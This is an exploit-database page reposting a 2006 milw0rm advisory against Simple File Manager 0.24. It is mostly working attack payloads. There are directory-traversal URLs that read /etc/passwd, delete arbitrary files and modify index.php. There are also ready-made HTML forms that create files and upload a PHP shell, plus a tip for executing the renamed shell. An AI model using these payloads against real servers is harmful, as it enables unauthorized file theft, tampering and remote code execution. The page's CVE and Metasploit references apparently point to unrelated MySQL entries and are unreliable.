header-logo
Suggest Exploit
vendor:
Simple File Manager
by:
None
7,5
CVSS
HIGH
Arbitrary File Reading
22
CWE
Product Name: Simple File Manager
Affected Version From: 0.24
Affected Version To: 0.24
Patch Exists: YES
Related CWE: CVE-2008-4456
CPE: None
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-1289/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-1461/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0110/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2008-4456/https://www.rapid7.com/db/vulnerabilities/suse-cve-2008-4456/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2008-4456/https://www.rapid7.com/db/vulnerabilities/apple-osx-mysql-cve-2008-4456/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

Reading of Arbitrary Files in Simple File Manager <=0.24

This vulnerability allows an attacker to download any file that the webserver has access to, including files outside of the SFM directory. This can be used to gain access to sensitive information such as passwords, configuration files, etc.

Mitigation:

Ensure that the web application is not vulnerable to directory traversal attacks.
Source

Exploit-DB raw data:

/*******************************************\
| flame vrs Simple File Manager <=0.24=>    |
| http://onedotoh.sourceforge.net/          |
| Various Vulnerbilities Including:         |
\*******************************************/
/+++++++++++++++++++++++++++++++++++++++++++\
| Using the scripts supplied by the webapp: |
| Reading of Arbitrary files                |
| Deletion of Arbitrary files               |
| Modification of Arbitrary files           |
| Creation of Arbitrary files               |
| Uploading of Malicious files              |
\+++++++++++++++++++++++++++++++++++++++++++/


/&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&\
| Simple File Manager (SFM) is a web based  |
| file management utility.                  |
| It is designed to be used by those that   |
| don't want to use ftp or SHOULD NOT use   |
| ftp. It can be dropped into a specific    |
| directory and give access to that         |
| directory as well as any directory below  |
| it, including those created by SFM. It    |
| can be placed in a specific directory and |
| configured to give access to other        |
| directories outside of its location       |
| (centralized). SFM gives its user upload, |
| rename, delete, directory creation as     |
| well as directory navigation (within its  |
| tree limits), as well as Create New File; |
| it also includes an image viewer, text    |
| viewer and mime type downloading.         |
\&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&/
 | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ |
 | Thats the description from the author...|
 | Which basically outlines all of its     |
 | vulnerbilities.                         |
 \_________________________________________/

/=========================================================================================================================\
############################ .:Reading of Arbitrary Files:. ###############################################################
# fm.php?action=download&filename=[RELATIVE PATH / FILENAME]&pathext=&u=&&copt=1&sortKey=2                                #
# EG: http://www.site.com/file/fm.php?action=download&filename=../../../../../../etc/passwd&pathext=&u=&&copt=1&sortKey=2 #
###########################################################################################################################
\=========================================================================================================================/

/=========================================================================================================================\
############################ .:Deletion of Arbirary Files:. ###############################################################
# fm.php?delete=[RELATIVE PATH / FILENAME]&copt=1&sortKey=2&u=&pathext=                                                   #
# EG: http://www.site.com/file/fm.php?delete=phpshell.php&copt=1&sortKey=2&u=&pathext=                                    #
###########################################################################################################################
\=========================================================================================================================/

/=========================================================================================================================\
############################# .:Modification of Arbitrary Files:. #########################################################
# fm.php?edit=[RELATEIVE PATH / FILENAME]&u=&copt=1&pathext=                                                              #
# EG: http://www.site.com/file/fm.php?edit=../index.php&u=&copt=1&pathext=                                                #
###########################################################################################################################
\=========================================================================================================================/

/=========================================================================================================================\
############################# .:Creation of Arbitrary Files:. #############################################################
# START LOCAL HTML FILE:                                                                                                  #
 <form name="form1" method="post" action="http://www.site.com/file/fm.php">
 <center>Filename: <input type="text" name="newfilename">
 <select class=altButton name="newfileext">
 <option>.txt</option><option>.html</option><option>.php</option>
 </select>
 <textarea name="newcontent" cols="60" rows="15">&lt;/textarea&gt;
 <input type="hidden" name="copt" value="1">
 <input type="submit" name="savenew" value="Save">
 <input type="hidden" name="u" value="">
 <input type="hidden" name="pathext" value="/">
 <input type="hidden" name=sortKey value="2">
 </center>
 </form>
# END LOCAL HTML FILE                                                                                                     #
###########################################################################################################################
# Note... various characters are escaped. And by default all .php files will be renamed to file.php.off                   #
# Note... The author decided to let you change the fm.php file anyway (*See Modification of Arbitrary files)              #
###########################################################################################################################
\=========================================================================================================================/

/=========================================================================================================================\
############################## .: Uploading of Malicious Files:. ##########################################################
# START LOCAL HTML FILE:                                                                                                  #
<form name="form1" method="post" action="http://www.site.com/file/fm.php" enctype="multipart/form-data">
<input type="hidden" name="MAX_FILE_SIZE" value="104857600">
<input type="hidden" name="copt" value="1">
<input type="file" name="uploadedfile">
<input type="submit" name="upload" value="Upload">
<input type="hidden" name="u" value="">
<input type="hidden" name="pathext" value="/">
<input type="hidden" name=sortKey value="2">
</form>
# END LOCAL HTML FILE                                                                                                     #
###########################################################################################################################
# Note... By default all .php files will be renamed to file.php.off, you can usually just browse to the file anyway and it#
# will execute... EG: http://www.site.com/file/phpshell.php.off                                                           #
###########################################################################################################################
\=========================================================================================================================/

                                       /++++++++++++++++++++++++++++\
                                       | Be good, and dont be too   |
                                       | hopeful about finding      |
                                       | yourself a gibbon running  |
                                       | this script. It predates   |
                                       | my #999999 hair.           |
                                       \++++++++++++++++++++++++++++/

      /{S}{H}{O}{U}{T}{-}{O}{U}{T}{S}{!}{!}{!}\
      |---------------------------------------|
      | <&bk> stfu flame                      |
      | <~PhaZe_One> no fame without flame    |
      | <+c|p> I love you flame               |
      | <%emc2> flame wishes death upon you   |
      | <Thaimaishu> are you emo flame?       |
      | <&[myg0t]40> flame dont be mad        |
      | *~str0ke humps flame's leg            |
      | <&ZoNe_VoRTeX> <3 flame               |
      |---------------------------------------|
      \{S}{H}{O}{U}{T}{-}{O}{U}{T}{S}{!}{!}{!}/

# milw0rm.com [2006-12-02]

Navigation

Suggest Exploit

Services By CQR